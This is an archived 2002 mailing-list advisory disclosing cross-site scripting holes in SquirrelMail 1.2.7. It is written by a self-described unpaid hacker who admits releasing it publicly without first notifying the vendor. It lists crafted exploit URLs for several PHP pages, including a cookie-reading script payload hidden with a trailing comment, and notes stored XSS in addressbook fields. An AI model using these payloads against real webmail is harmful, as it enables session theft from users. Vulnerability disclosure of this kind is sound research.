----- Original Message -----
From: "DarC KonQuesT" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Friday, September 20, 2002 12:14 AM
Subject: Squirrel Mail 1.2.7 XSS Exploit
> ****Sorry if you receive two of these.****
>
> DarC KonQuesT XSS Release-
>
> Product: Squirrel Mail 1.2.7 - released June 21, 2002 (tested, others
> possibly vulnerable)
> Vendor: Squirrel Mail - Web: www.squirrelmail.org
> Problem: Cross Site Scripting
> Severity: Moderate
> Operating System(s): Tested against Red Hat 7.3, all others vulnerable if
> they are using this version of Squirrel.
>
> Discovered: August 4, 2002
> Vendor Notified: um...now?
> Public Release: Now - September 10
>
> Background:
> Squirrel Mail is a webmail daemon that provides a HTTP mail interface
using
> PHP.
>
> Release Notes:
> I **DID NOT** notify the developers (until now) because I am a lazy
SoB
> and my motivation is lacking (free lance, unpaid, bored guy). I kept
putting
> it off (notice discovery date and the release now) and now they've
released
> several newer versions (most recently 1.3.1), which I have not tested.
> Because of the release(S) of the new versions and due to my gross
> slothfulness, I've decided to do a direct public release. Also, for those
of
> you who know PHP, you should be able to fix this problem without much
> trouble. Apologies to those who feel like they're getting screwed over by
> this.
>
> Problem:
> User input is not sanitized so execution of arbitrary code on a client
> computer is possible through a Cross Site Scripting (XSS) hole while the
> code executes under the domain of the site which the webmail is hosted at.
> Similar holes exist in the following utilized scripts:
> addressbook.php
> options.php
> search.php
> help.php
>
> _MAIN_ Exploit:
> The XSS hole I developed the most is in addressbook.php. I was able to
> inject and execute javascript code and after opening the addressbook page
> there was no indication that I had changed anything (after entering the
HTML
> comment tags to get rid of some hanging code that my javascript had made
> text).
>
> The URL I crafted for the exploit is as follows:
>
> http://<VULNERABLE
>
SITE>.net/webmail/src/addressbook.php?"><script>alert(document.cookie)</scri
> pt><!--
>
> If you execute the code without the HTML comment tag on the end it leaves
a
> nasty hanging bit of HTML code which is a clear indication that something
> has gone awry to many users (however some may ignore it as they don't
> understand it).
>
> _OTHER_ Holes:
>
> 1) This will reveal the path to PHP directory and other...maybe
interesting
> to someone, I didn't really care but decided to include it. The problem is
> in options.php.
>
> http://<VULNERABLE
> SITE>.net/webmail/src/options.php?optpage=<script>alert('boop!')</script>
>
> it returns the following on the page for the server I tested:
> Fatal error: Failed opening required ''
> (include_path='.:/php/includes:/usr/share/php') in
> /var/www/squirrelmail/src/options.php on line 172
>
> 2) This is a XSS hole in search.php:
>
> http://<VULNERABLE
>
SITE>.net/webmail/src/search.php?mailbox=<script>alert('boop!')</script>&wha
> t=x&where=BODY&submit=Search
>
> 3) Another in search.php
>
> http://<VULNERABLE
>
SITE>.net/webmail/src/search.php?mailbox=INBOX&what=x&where=<script>alert('b
> oop!')</script>&submit=Search
>
> 4) XSS in help.php:
>
> http://<VULNERABLE
> SITE>.net/webmail/src/help.php?chapter=<script>alert('boop!')</script>
>
> 5) XSS in addressbook (different):
> Manually entered nicks, email addresses, first names, last names, and
> info sections in the addressbook are not filtered so script can be placed
> and executed through them the next time the page is viewed.
>
> Vendor Action:
> I didn't notify....yeah yeah I know....
>
> Aftermath:
> It seems to me this has all the normal dangers of a XSS hole so
listing
> them seems pointless (I'm sure we've all seen them). If someone expands
this
> idea to include other/larger possibilites I'd be interested in hearing
about
> it.
> FINAL UPDATE - 9/10/02 I found what I believe is the main developer or
head
> guy's email address so I'm direct mailing him too. Maybe he can tell us if
> the newer versions are fixed.
>
> (---There was a section here about a quote from their page --Revision=
> Konstantin ("Icon") Riabitsev informed me that MagicHTML has nothing to do
> with this but with the protection of email viewed in HTML form...seriously
> helliphino I didn't bother to look it up. Thanks for the correction.--)
>
> Later on, and have fun,
>
> - DarC KonQuesT -(DiR)-
> Ringleader - DarC Horizons
> United States of America
>
> Greets:
> DarCLinG, V3ga, st3v3, Jenn, Christina, John (heh, you're next)
>
> "Congress shall make no law abridging the freedom of sXXXch, or the right
of
> the people peaceably to XXXemble, and to peXXXion the government for a
> redress of grievances." -- Marc Rotenberg
>
>
>
>
> ---
> Outgoing mail is certified Virus Free.
> Checked by AVG anti-virus system (http://www.grisoft.com).
> Version: 6.0.377 / Virus Database: 211 - Release Date: 7/15/02
>
>
>
---
Pentru dezabonare, trimiteti mail la
[EMAIL PROTECTED] cu subiectul 'unsubscribe rlug'.
REGULI, arhive si alte informatii: http://www.lug.ro/mlist/
